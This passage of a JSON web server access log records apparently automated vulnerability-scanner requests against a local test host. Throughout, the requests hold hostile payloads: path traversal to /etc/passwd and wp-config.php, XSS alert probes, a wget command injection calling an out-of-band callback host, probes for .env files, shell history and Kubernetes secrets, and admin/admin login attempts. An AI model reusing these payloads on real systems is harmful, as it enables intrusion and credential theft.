HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pki/images/keyManager_title.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fca28bc0smpvbbtig07h0t38pfd5fhsofg.oast.pro%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webtools/control/main HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KBxcyyvCHXgMJOZpdJaV9263R HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:57 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 